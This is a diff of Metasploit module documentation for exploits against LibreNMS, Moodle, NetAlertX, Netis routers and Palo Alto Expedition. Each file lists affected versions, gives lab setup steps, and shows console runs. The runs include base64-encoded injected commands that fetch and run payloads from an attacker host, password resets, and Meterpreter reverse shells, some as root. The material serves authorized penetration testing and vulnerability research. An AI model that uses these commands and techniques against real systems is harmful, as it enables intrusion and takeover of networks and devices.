+/root
+meterpreter > 
+```
@@ -0,0 +1,122 @@
+## Vulnerable Application
+
+An authenticated attacker can create dangerous directory names on the system and
+alter sensitive configuration parameters through the web portal.
+Those two defects combined then allows to inject arbitrary OS commands inside shell_exec() calls,
+thus achieving arbitrary code execution.
+
+The vulnerability affects:
+
+    * 24.9.0 <= LibreNMS <= 24.9.1
+
+This module was successfully tested on:
+
+    * LibreNMS 24.9.0 installed on Ubuntu 22.04
+    * LibreNMS 24.9.1 installed on Ubuntu 22.04
+
+
+### Installation
+
+1. Follow the [official instructions](https://docs.librenms.org/Installation/Install-LibreNMS/).
+After git clone, change version: `git checkout tags/24.9.1`.
+
+2. Comment out the last line in `/etc/cron.d/librenms`:
+`19 0 * * * librenms /opt/librenms/daily.sh >> /dev/null 2>&1`.
+Otherwise, the version will be updated to the latest, causing the exploit to fail.
+
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/linux/http/librenms_authenticated_rce_cve_2024_51092`
+4. Do: `run lhost=<lhost> rhost=<rhost> username=<username> password=<password>`
+5. (Optional) Do: `php artisan device:poll all` on the victim machine or wait up to 5 minutes (default cron setting)
+6. You should get a meterpreter
+
+
+## Options
+### USERNAME (required)
+User name for LibreNMS.
+
+### PASSWORD (required)
+Password for LibreNMS.
+
+### PATH (required)
+LibreNMS installed location. Default is `/opt/librenms`.
+
+### WAIT (required)
+Wait time (seconds) for cron to poll the device. Default is `315`.
+
+
+## Scenarios
+```
+msf6 > use exploit/linux/http/librenms_authenticated_rce_cve_2024_51092
+[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/librenms_authenticated_rce_cve_2024_51092) > options
+
+Module options (exploit/linux/http/librenms_authenticated_rce_cve_2024_51092):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   PASSWORD                   yes       Password for LibreNMS
+   PATH      /opt/librenms    yes       LibreNMS installed location
+   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT     80               yes       The target port (TCP)
+   SSL       false            no        Negotiate SSL/TLS for outgoing connections
+   USERNAME                   yes       User name for LibreNMS
+   VHOST                      no        HTTP server virtual host
+   WAIT      315              yes       Wait time (seconds) for cron to poll the device
+
+
+Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       WGET             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      n                no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH       s                no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces
+   LHOST               192.168.0.12     yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Linux Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/librenms_authenticated_rce_cve_2024_51092) > run lhost=192.168.56.1 rhost=192.168.56.17 username=librenms password=librenms
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Successfully logged into LibreNMS.
+[+] The target appears to be vulnerable. LibreNMS version 24.9.1 detected, which is vulnerable.
+[*] Try to add host: 'f;echo d2dldCAtcU8gLi9uIGh0dHA6Ly8xOTIuMTY4LjU2LjE6ODA4MC9zO2NobW9kICt4IC4vbjsuL24m|base64 -d|bash;#', length: 100
+[*] Added host.
+[*] Actual payload: wget -qO ./n http://192.168.56.1:8080/s;chmod +x ./n;./n&
+[*] Waiting up to 315 seconds for cron to poll the device...
+[*] Sending stage (3045380 bytes) to 192.168.56.17
+[+] Deleted n
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.17:40228) at 2025-01-17 21:19:20 +0900
+[*] Reset snmpget to default.
+[*] Deleted device: 353
+
+meterpreter > getuid
+Server username: librenms
+meterpreter > sysinfo
+Computer     : 192.168.56.17
+OS           : Ubuntu 22.04 (Linux 6.8.0-50-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```
@@ -0,0 +1,101 @@
+## Vulnerable Application
+
+This module exploits a command injection vulnerability in Moodle (CVE-2024-43425) to obtain remote code execution.
+By default, the application will run in the context of www-data, so only a limited shell can be obtained.
+
+Valid credentials are required to exploit this vulnerability. Moreover, the user must be authorized to either add a new or modify an
+existing quiz, in order to reach the vulnerable function and trigger the bug. User roles that fall into this category include
+`Teacher` and `Administrator`, but might differ depending on the specific deployment and configuration.
+
+Affected versions include:
+* 4.4 to 4.4.1
+* 4.3 to 4.3.5
+* 4.2 to 4.2.8
+* 4.1 to 4.1.11
+
+Moodle published an advisory [here](https://moodle.org/mod/forum/discuss.php?d=461193).
+
+The original advisory is available [here](https://www.redteam-pentesting.de/en/advisories/rt-sa-2024-009/), and a more detailed writeup is
+available [here](https://blog.redteam-pentesting.de/2024/moodle-rce/).
+
+## Testing
+
+Legacy releases from Moodle can be obtained from [here](https://download.moodle.org/releases/legacy/).
+An installation guide is available [here](https://docs.moodle.org/404/en/Step-by-step_Installation_Guide_for_Ubuntu).
+
+**Successfully tested on**
+
+- Moodle v4.4.1 on Ubuntu 20.04 LTS
+
+## Verification Steps
+
+1. Deploy Moodle
+2. Start `msfconsole`
+3. `use exploit/linux/http/moodle_rce`
+4. `set USERNAME <USER>`
+5. `set PASSWORD <PASSWORD>`
+6. `set CMID <ID>`
+7. `set COURSEID <ID>`
+8. `set RHOSTS <IP>`
+9. `set LHOST <IP>`
+10. `exploit`
+
+## Options
+
+### USERNAME
+The username to authenticate with in Moodle.
+
+### PASSWORD
+The password for the user.
+
+### CMID
+The course module ID. Can be retrieved from the URL when the "Add question" button is pressed within a quiz of a course
+(e.g., IP>/moodle/mod/quiz/edit.php?cmid=4).
+
+### COURSEID
+The course ID. Can be retrieved from the URL when the course is selected (e.g., <IP>/moodle/course/view.php?id=3).
+
+## Scenarios
+
+Running the module against Moodle v4.4.1 should result in an output similar to the following:
+
+```
+msf6 > use exploit/linux/http/moodle_rce 
+[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/moodle_rce) > set USERNAME testuser
+USERNAME => testuser
+msf6 exploit(linux/http/moodle_rce) > set PASSWORD iusldbf843498fKJASD
+PASSWORD => iusldbf843498fKJASD
+msf6 exploit(linux/http/moodle_rce) > set CMID 2
+CMID => 2
+msf6 exploit(linux/http/moodle_rce) > set COURSEID 2
+COURSEID => 2
+msf6 exploit(linux/http/moodle_rce) > set RHOSTS 192.168.217.141
+RHOSTS => 192.168.217.141
+msf6 exploit(linux/http/moodle_rce) > set LHOST 192.168.217.128
+LHOST => 192.168.217.128
+msf6 auxiliary(exploit/linux/http/moodle_rce) > exploit 
+[*] Started reverse TCP handler on 192.168.217.128:4444 
+[*] Obtaining MoodleSession and logintoken...
+[+] Server reachable.
+[*] Authenticating as testuser...
+[*] Successfully authenticated.
+[*] Obtaining sesskey, courseContextId, and category...
+[*] Injecting command...
+[*] Sending stage (3045380 bytes) to 192.168.217.141
+[*] Meterpreter session 1 opened (192.168.217.128:4444 -> 192.168.217.141:37152) at 2024-09-01 18:19:44 -0400
+[-] Exploit aborted due to failure: unreachable: Failed to receive a reply from the server.
+[*] Exploit completed, but no session was created.
+msf6 exploit(linux/http/moodle_rce) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > sysinfo 
+Computer     : 192.168.217.141
+OS           : Ubuntu 24.04 (Linux 6.8.0-41-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+  
+meterpreter > getuid 
+Server username: www-data
+```
@@ -0,0 +1,110 @@
+## Vulnerable Application
+
+An attacker can update NetAlertX settings with no authentication, which results in RCE.
+
+The vulnerability affects:
+
+    * v23.01.14 <= NetAlertX <= v24.9.12
+
+This module was successfully tested on:
+
+    * NetAlertX v24.9.12 installed with Docker on Ubuntu 22.04
+
+
+### Installation
+
+1. `docker pull jokobsk/netalertx:24.9.12`
+
+2. docker run
+```bash
+docker run --rm --network=host \
+  -v /tmp/netalertx:/app/config \
+  -v /tmp/netalertx:/app/db \
+  -e TZ=Europe/Berlin \
+  -e PORT=20211 \
+  jokobsk/netalertx:24.9.12
+```
+
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/linux/http/netalertx_rce_cve_2024_46506`
+4. Do: `run lhost=<lhost> rhost=<rhost>`
+5. You should get a meterpreter
+
+
+## Options
+### WAIT (required)
+Wait time (seconds) for the payload to be set. Default is `75`.
+
+### CLEANUP
+Restore DBCLNP_CMD to original value after execution. Default is `true`.
+
+
+## Scenarios
+```
+msf6 > use exploit/linux/http/netalertx_rce_cve_2024_46506
+[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/netalertx_rce_cve_2024_46506) > options
+
+Module options (exploit/linux/http/netalertx_rce_cve_2024_46506):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   CLEANUP  true             no        Restore DBCLNP_CMD to original value after execution
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT    20211            yes       The target port (TCP)
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+   WAIT     75               yes       Wait time (seconds) for the payload to be set
+
+
+Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        true             yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      GXIuXvsu         no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces
+   LHOST               192.168.0.12     yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Linux Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/netalertx_rce_cve_2024_46506) > run lhost=192.168.56.1 rhost=192.168.56.17
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version 24.9.12 detected.
+[*] Sent request to update DBCLNP_CMD to '/bin/bash -c echo${IFS}Y3VybCAtc28gLi9QWHhyY3hFRCBodHRwOi8vMTkyLjE2OC41Ni4xOjgwODAvRy04Zjhua29IMGRUWkdQc052UzIzZztjaG1vZCAreCAuL1BYeHJjeEVEOy4vUFh4cmN4RUQmc2xlZXAgNztybSAtcmYgLi9QWHhyY3hFRA==|base64${IFS}-d|/bin/bash'.
+[*] Waiting settings really updated...
+[*] Sending stage (3045380 bytes) to 192.168.56.17
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.17:57510) at 2025-02-10 21:57:30 +0900
+[*] Added the payload to the queue. Waiting for the payload to run...
+[*] Sent request to update DBCLNP_CMD to 'python3 /app/front/plugins/db_cleanup/script.py pluginskeephistory={pluginskeephistory} hourstokeepnewdevice={hourstokeepnewdevice} daystokeepevents={daystokeepevents} pholuskeepdays={pholuskeepdays}'.
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 192.168.56.17
+OS           :  (Linux 6.8.0-51-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```
@@ -0,0 +1,289 @@
+## Vulnerable Application
+Several Netis Routers including rebranded routers from GLCtec and Stonet suffer from a command injection vulnerability at the change
+password page of the router web interface (see [CVE-2024-48456](https://www.cve.org/CVERecord?id=CVE-2024-48456) for more details).
+The vulnerability stems from improper handling of the password and new password parameter within the router's web interface.
+Attackers can inject a command in the password or new password parameter, encoded in base64, to exploit the command injection
+vulnerability.
+When exploited, this can lead to command execution, potentially allowing the attacker to take full control of the router.
+An attacker needs to be authenticated to initiate this RCE, however [CVE-2024-48457](https://www.cve.org/CVERecord?id=CVE-2024-48457)
+allows an unauthenticated attacker to reset the Wifi and router password, hence gaining full root access to the router to execute
+the RCE.
+
+Last but not least, [CVE-2024-48455](https://www.cve.org/CVERecord?id=CVE-2024-48455) allows for unauthenticated information disclosure
+revealing sensitive configuration information of the router which can be used by the attacker to determine if the router is running
+specific vulnerable firmware.
+
+The following router firmware versions are vulnerable:
+
+- [x] netis_MW5360_V1.0.1.3031_fw.bin
+- [x] Netis_MW5360-1.0.1.3442.bin
+- [x] Netis_MW5360_RUSSIA_844.bin
+- [x] netis_NC21_V3.0.0.3800.bin (https://www.netisru.com/support/downinfo.html?id=40)
+- [x] netis_NC63_V3.0.0.3327.bin (https://www.netis-systems.com/support/downinfo.html?id=35)
+- [x] netis_NC63_v4_Bangladesh-V3.0.0.3889.bin (https://www.netis-systems.com/support/downinfo.html?id=35)
+- [x] Netis_NC63-V3.0.0.3833.bin (https://www.netisru.com/support/downinfo.html?id=35)
+- [x] netis_app_BeeWiFi_NC63_v4_Bangladesh-V3.0.0.3503.bin
+- [x] netis_NC65_V3.0.0.3749.bin
+- [x] Netis_NC65_Bangladesh-V3.0.0.3508.bin (https://www.netis-systems.com/support/downinfo.html?id=34)
+- [x] Netis_NC65v2-V3.0.0.3800.bin (https://www.netisru.com/support/downinfo.html?id=34)
+- [x] netis_NX10_V2.0.1.3582_fw.bin
+- [x] netis_NX10_V2.0.1.3643.bin
+- [x] Netis_NX10_v1_Bangladesh-V3.0.0.4142.bin (https://www.netis-systems.com/support/downinfo.html?id=33)
+- [x] netis_NX10-V3.0.1.4205.bin (https://www.netisru.com/support/downinfo.html?id=33)
+- [x] netis_app_BeeWiFi_NC21_v4_Bangladesh-V3.0.0.3329.bin
+- [x] netis_app_BeeWiFi_NC21_v4_Bangladesh-V3.0.0.3500.bin
+- [x] Netis_NC21_v2_Bangladesh-V3.0.0.3854.bin (https://www.netis-systems.com/support/downinfo.html?id=40)
+- [x] GLC_ALPHA_AC3-V3.0.2.115.bin (https://drive.google.com/drive/folders/1P69yUfzeZeR6oABmIdcJ6fG57-Xjrzx6)
+
+and potentially others...
+
+## Installation
+Ideally, to test this module, you would need a vulnerable Netis Router device.
+However, by downloading the firmware and install and use `FirmAE` to emulate the router,
+we can simulate the router and test the vulnerable endpoint.
+
+### Installation steps to emulate the router firmware with FirmAE
+* Install `FirmAE` on your Linux distribution using the installation instructions provided [here](https://github.com/pr0v3rbs/FirmAE).
+* To emulate the specific firmware that comes with the Netis devices, `binwalk` might need to be able to handle a sasquatch filesystem.
+* This requires additional [installation steps](https://gist.github.com/thanoskoutr/4ea24a443879aa7fc04e075ceba6f689).
+* Please do not forget to run this after your `FirmAE` installation otherwise you will not be able to extract the firmware.
+* Download the vulnerable firmware from Netis or from one of the other brands like GLCtec or Stonet.
+* We will pick `GLC_ALPHA_AC3-V3.0.2.115.bin` for the demonstration.
+* Start emulation.
+* First run `./init.sh` to initialize and start the Postgress database.
+* Start a debug session  `./run.sh -d Netis /root/FirmAE/firmwares/GLC_ALPHA_AC3-V3.0.2.115.bin`
+* This will take a while, but in the end you should see the following...
+```shell
+ # ./run.sh -d netis /root/FirmAE/firmwares/GLC_ALPHA_AC3-V3.0.2.115.bin
+[*] /root/FirmAE/firmwares/GLC_ALPHA_AC3-V3.0.2.115.bin emulation start!!!
+[*] extract done!!!
+[*] get architecture done!!!
+mke2fs 1.47.0 (5-Feb-2023)
+e2fsck 1.47.0 (5-Feb-2023)
+[*] infer network start!!!
+[IID] 15
+[MODE] debug
+[+] Network reachable on 192.168.1.254!
+[+] Web service on 192.168.1.254
+[+] Run debug!
+Creating TAP device tap15_0...
+Set 'tap15_0' persistent and owned by uid 0
+Bringing up TAP device...
+Starting emulation of firmware... 192.168.1.254 true true 79.316641060 186.772281412
+/root/FirmAE/./debug.py:7: DeprecationWarning: 'telnetlib' is deprecated and slated for removal in Python 3.13
+  import telnetlib
+[*] firmware - GLC_ALPHA_AC3-V3.0.2.115
+[*] IP - 192.168.1.254
+[*] connecting to netcat (192.168.1.254:31337)
+[+] netcat connected
+------------------------------
+|       FirmAE Debugger      |
+------------------------------
+1. connect to socat
+2. connect to shell
+3. tcpdump
+4. run gdbserver
+5. file transfer
+6. exit
+```
+* check if you can `ping` the emulated router and run `nmap` to check the ports
+```shell
+ # ping 192.168.1.254
+PING 192.168.1.254 (192.168.1.254) 56(84) bytes of data.
+64 bytes from 192.168.1.254: icmp_seq=1 ttl=64 time=11.7 ms
+64 bytes from 192.168.1.254: icmp_seq=2 ttl=64 time=4.93 ms
+64 bytes from 192.168.1.254: icmp_seq=3 ttl=64 time=1.30 ms
+^C
+--- 192.168.1.254 ping statistics ---
+3 packets transmitted, 3 received, 0% packet loss, time 2003ms
+rtt min/avg/max/mdev = 1.297/5.979/11.713/4.316 ms
+ # nmap 192.168.1.254
+Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-29 19:39 UTC
+Nmap scan report for 192.168.1.254
+Host is up (0.020s latency).
+Not shown: 996 closed tcp ports (reset)
+PORT    STATE SERVICE
+22/tcp  open  ssh
+53/tcp  open  domain
+80/tcp  open  http
+443/tcp open  https
+MAC Address: 00:E0:4C:81:96:C1 (Realtek Semiconductor)
+
+Nmap done: 1 IP address (1 host up) scanned in 1.19 seconds
+```
+You are now ready to test the module using the emulated router hardware on IP address 192.168.1.254
+
+## Verification Steps
+- [x] Start `msfconsole`
+- [x] `use exploit/linux/http/netis_unauth_rce_cve_2024_48456_and_48457`
+- [x] `set rhosts <ip-target>`
+- [x] `set lhost <ip-attacker>`
+- [x] `set target <0=Linux Dropper>`
+- [x] `exploit`
+
+you should get a `Meterpreter` session.
+
+```msf
+msf6 exploit(linux/http/netis_unauth_rce_cve_2024_48456_and_48457) > info
+
+       Name: Netis Router Exploit Chain Reactor (CVE-2024-48455, CVE-2024-48456 and CVE-2024-48457).
+     Module: exploit/linux/http/netis_unauth_rce_cve_2024_48456_and_48457
+   Platform: Linux
+       Arch: mipsle
+ Privileged: Yes
+    License: Metasploit Framework License (BSD)
+       Rank: Excellent
+  Disclosed: 2024-12-27
+
+Provided by:
+  h00die-gr3y <h00die.gr3y@gmail.com>
+
+Module side effects:
+ ioc-in-logs
+ artifacts-on-disk
+
+Module stability:
+ crash-safe
+
+Module reliability:
+ repeatable-session
+
+Available targets:
+      Id  Name
+      --  ----
+  =>  0   Linux Dropper
+
+Check supported:
+  Yes
+
+Basic options:
+  Name       Current Setting  Required  Description
+  ----       ---------------  --------  -----------
+  CMD_DELAY  30               yes       Delay in seconds between payload commands to avoid locking
+  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+  RHOSTS     192.168.1.254    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basic
+                                        s/using-metasploit.html
+  RPORT      80               yes       The target port (TCP)
+  SSL        false            no        Negotiate SSL/TLS for outgoing connections
+  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+  TARGETURI  /                yes       The Netis router endpoint URL
+  URIPATH                     no        The URI to use for this exploit (default is random)
+  VHOST                       no        HTTP server virtual host
+
+
+  When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+  Name     Current Setting  Required  Description
+  ----     ---------------  --------  -----------
+  SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the
+                                      local machine or 0.0.0.0 to listen on all addresses.
+  SRVPORT  1981             yes       The local port to listen on.
+
+Payload information:
+
+Description:
+  Several Netis Routers including rebranded routers from GLCtec and Stonet suffer from a command injection
+  vulnerability at the change admin password page of the router web interface (see CVE-2024-48456 for more details).
+  The vulnerability stems from improper handling of the 'password' and 'new password' parameter within the
+  router's web interface. Attackers can inject a command in the 'password' or 'new password' parameter,
+  encoded in base64, to exploit the command injection vulnerability. When exploited, this can lead to
+  command execution, potentially allowing the attacker to take full control of the router.
+  An attacker needs to be authenticated to initiate this RCE, however CVE-2024-48457 allows an unauthenticated
+  attacker to reset the Wifi and router password, hence gaining full admin access to the router to execute the RCE.
+
+  Last but not least, CVE-2024-48455 allows for unauthenticated information disclosure revealing sensitive configuration
+  information of the router which can be used by the attacker to determine if the router is running specific vulnerable
+  firmware.
+
+  The following router firmware versions are vulnerable:
+  * netis_MW5360_V1.0.1.3031_fw.bin
+  * Netis_MW5360-1.0.1.3442.bin
+  * Netis_MW5360_RUSSIA_844.bin
+  * netis_NC21_V3.0.0.3800.bin (https://www.netisru.com/support/downinfo.html?id=40)
+  * netis_NC63_V3.0.0.3327.bin (https://www.netis-systems.com/support/downinfo.html?id=35)
+  * netis_NC63_v4_Bangladesh-V3.0.0.3889.bin (https://www.netis-systems.com/support/downinfo.html?id=35)
+  * Netis_NC63-V3.0.0.3833.bin (https://www.netisru.com/support/downinfo.html?id=35)
+  * netis_app_BeeWiFi_NC63_v4_Bangladesh-V3.0.0.3503.bin
+  * netis_NC65_V3.0.0.3749.bin
+  * Netis_NC65_Bangladesh-V3.0.0.3508.bin (https://www.netis-systems.com/support/downinfo.html?id=34)
+  * Netis_NC65v2-V3.0.0.3800.bin (https://www.netisru.com/support/downinfo.html?id=34)
+  * netis_NX10_V2.0.1.3582_fw.bin
+  * netis_NX10_V2.0.1.3643.bin
+  * Netis_NX10_v1_Bangladesh-V3.0.0.4142.bin (https://www.netis-systems.com/support/downinfo.html?id=33)
+  * netis_NX10-V3.0.1.4205.bin (https://www.netisru.com/support/downinfo.html?id=33)
+  * netis_app_BeeWiFi_NC21_v4_Bangladesh-V3.0.0.3329.bin
+  * netis_app_BeeWiFi_NC21_v4_Bangladesh-V3.0.0.3500.bin
+  * Netis_NC21_v2_Bangladesh-V3.0.0.3854.bin (https://www.netis-systems.com/support/downinfo.html?id=40)
+  * GLC_ALPHA_AC3-V3.0.2.115.bin (https://drive.google.com/drive/folders/1P69yUfzeZeR6oABmIdcJ6fG57-Xjrzx6)
+  * potentially others...
+
+References:
+  https://nvd.nist.gov/vuln/detail/CVE-2024-48455
+  https://nvd.nist.gov/vuln/detail/CVE-2024-48456
+  https://nvd.nist.gov/vuln/detail/CVE-2024-48457
+  https://github.com/users/h00die-gr3y/projects/1
+
+View the full module info with the info -d command.
+```
+## Options
+### CMD_DELAY
+Chained command lines using `;` do not work, so each command need to be executed in a separate request
+with delay of 30 seconds of more to avoid session locking using the `CMD_DELAY` option.
+
+## Scenarios
+### GLCtec ALPHA-AC3 Router Emulation Linux Dropper -  linux/mipsle/meterpreter_reverse_tcp
+```msf
+msf6 exploit(linux/http/netis_unauth_rce_cve_2024_48456_and_48457) > rexploit
+[*] Reloading module...
+[*] Started reverse TCP handler on 192.168.1.253:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.1.254:80 can be exploited.
+[+] The target appears to be vulnerable. GLC(ALPHA-AC3)-V3.0.2.115
+[*] Resetting router password for authentication.
+[*] Logging in with the new router password 4vNcez42D to get the password cookie.
+[*] Saving router credentials (root) at the msf database.
+[*] Executing Linux Dropper for linux/mipsle/meterpreter_reverse_tcp
+[*] Using URL: http://192.168.1.253:1981/ZhIplAe6jD9O7J
+[*] Executing wget -qO /tmp/hMvelDeE http://192.168.1.253:1981/ZhIplAe6jD9O7J
+[*] Client 192.168.1.254 (Wget) requested /ZhIplAe6jD9O7J
+[*] Sending payload to 192.168.1.254 (Wget)
+[*] Command Stager progress -  53.85% done (63/117 bytes)
+[*] Executing chmod +x /tmp/hMvelDeE
+[*] Command Stager progress -  72.65% done (85/117 bytes)
+[*] Executing /tmp/hMvelDeE
+[+] Deleted /tmp/hMvelDeE
+[*] Meterpreter session 7 opened (192.168.1.253:4444 -> 192.168.1.254:54551) at 2024-12-29 11:28:49 +0000
+[*] Command Stager progress -  83.76% done (98/117 bytes)
+[*] Command Stager progress - 100.00% done (117/117 bytes)
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 192.168.1.254
+OS           :  (Linux 3.10.90)
+Architecture : mips
+BuildTuple   : mipsel-linux-muslsf
+Meterpreter  : mipsle/linux
+meterpreter > pwd
+/etc/boa
+meterpreter > ls
+Listing: /etc/boa
+=================
+
+Mode              Size     Type  Last modified              Name
+----              ----     ----  -------------              ----
+100755/rwxr-xr-x  9581     fil   2024-03-04 09:22:46 +0000  boa.conf
+100755/rwxr-xr-x  2118     fil   2024-03-04 09:22:46 +0000  mime.types
+
+meterpreter >
+```
+## Limitations
+Staged payloads might core dump on the target, so use stage-less payloads when using the Linux Dropper target.
+Another limitation is that the router has a very limited command set that can be leveraged,
+so the only option is to use the `wget` command to drop an executable on the target to get a session.
+Chained command lines using `;` do not work, so each command need to be executed in a separate request
+with a delay of 30 seconds or more to avoid session locking (see the `CMD_DELAY` option).
+
+Last but not least, be mindful that the admin router password gets overwritten by the exploit,
+resulting in a clear indicator of compromise.
@@ -0,0 +1,113 @@
+## Vulnerable Application
+
+This module exploits two vulnerabilities in Palo Alto Expedition to obtain a remote shell. The first vulnerability, CVE-2024-5910, allows to
+reset the password of the admin user. The second vulnerability, CVE-2024-9464, is an authenticated OS command injection.
+
+When credentials are provided, this module will only exploit the second vulnerability. If no credentials are provided, the module will
+first try to reset the admin password and then perform the OS command injection. In a default installation, commands will get executed in
+the context of www-data.
+
+Note: If no credentials are available, the module will attempt to reset the admin password. For this, the parameter RESET_ADMIN_PASSWD must
+explicitly be set to true.
+
+## Testing
+
+The software can be obtained from
+[the vendor](https://live.paloaltonetworks.com/t5/expedition/ct-p/migration_tool).
+
+Installation instructions are available [here]
+(https://live.paloaltonetworks.com/t5/expedition-articles/expedition-documentation/ta-p/215619?attachment-id=13781).
+
+**Successfully tested on**
+
+- Expedition v1.2.91 on Ubuntu Server 20.04.1.
+
+## Verification Steps
+
+1. Install and run the application
+2. Start `msfconsole` and run the following commands:
+
+```
+msf6 > msf6 > use exploit/linux/http/paloalto_expedition_rce 
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/paloalto_expedition_rce) > set RHOSTS <IP>
+msf6 exploit(linux/http/paloalto_expedition_rce) > exploit
+```
+
+You should get a meterpreter session in the context of `www-data`.
+
+## Options
+
+### USERNAME
+Username for authentication, if available.
+
+### PASSWORD
+Password for the associated user.
+### WRITABLE_DIR
+A writable location for the exploit to stage the command payload.
+
+### RESET_ADMIN_PASSWD
+If the username and password are not specified, the module will attempt to reset the admin password to the default password `paloalto`. This
+is also done to authenticate and retrieve the exact version information, in case no credentials have been provided. As this alters the
+configuration of the target system, the `RESET_ADMIN_PASSWD` parameter serves as a safeguard that must explicility set to true before the
+reset endpoint is being invoked.
+
+## Scenarios
+
+Running the exploit against Expedition v1.2.91 on Ubuntu Server 20.04.1, using curl or wget as a fetch command, should result in an output
+similar to the following:
+
+```
+msf6 exploit(linux/http/paloalto_expedition_rce) > exploit 
+
+[*] Command to run on remote host: curl -so /tmp/zRe http://192.168.137.204:8080/qv_gAdz7yjcgH-ohM3GesA; chmod +x /tmp/zRe; /tmp/zRe &
+[*] Fetch handler listening on 192.168.137.204:8080
+[*] HTTP server started
+[*] Adding resource /qv_gAdz7yjcgH-ohM3GesA
+[*] Started reverse TCP handler on 192.168.137.204:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] Admin password successfully restored to default value paloalto (CVE-2024-5910).
+[+] Successfully authenticated
+[*] Got csrftoken: MTczMTM4MjY0NUNRV0RkNXBXR3Vic2hkR1ZZTHBSQTd1cWY5MjVWYWIw
+[*] Version retrieved: 1.2.91
+[+] The target appears to be vulnerable.
+[*] Command chunk size = 30
+[+] Successfully authenticated
+[*] Got csrftoken: MTczMTM4MjY0NnpDVDRUcXdDRWhvZ09HWDNnMFdHUW81cXU2aHppTEdE
+[*] Adding a new cronjob...
+[*] Staging chunk 1 of 9
+[*] Running command: echo -n "echo Y3VybCAtc28gL3RtcC96UmUga" > /tmp/fglGT
+[*] Staging chunk 2 of 9
+[*] Running command: echo -n "HR0cDovLzE5Mi4xNjguMTM3LjIwNDo" >> /tmp/fglGT
+[*] Staging chunk 3 of 9
+[*] Running command: echo -n "4MDgwL3F2X2dBZHo3eWpjZ0gtb2hNM" >> /tmp/fglGT
+[*] Staging chunk 4 of 9
+[*] Running command: echo -n "0dlc0E7IGNobW9kICt4IC90bXAvelJ" >> /tmp/fglGT
+[*] Staging chunk 5 of 9
+[*] Running command: echo -n "lOyAvdG1wL3pSZSAm|((command -v" >> /tmp/fglGT
+[*] Staging chunk 6 of 9
+[*] Running command: echo -n " base64 >/dev/null && (base64 " >> /tmp/fglGT
+[*] Staging chunk 7 of 9
+[*] Running command: echo -n "--decode || base64 -d)) || (co" >> /tmp/fglGT
+[*] Staging chunk 8 of 9
+[*] Running command: echo -n "mmand -v openssl >/dev/null &&" >> /tmp/fglGT
+[*] Staging chunk 9 of 9
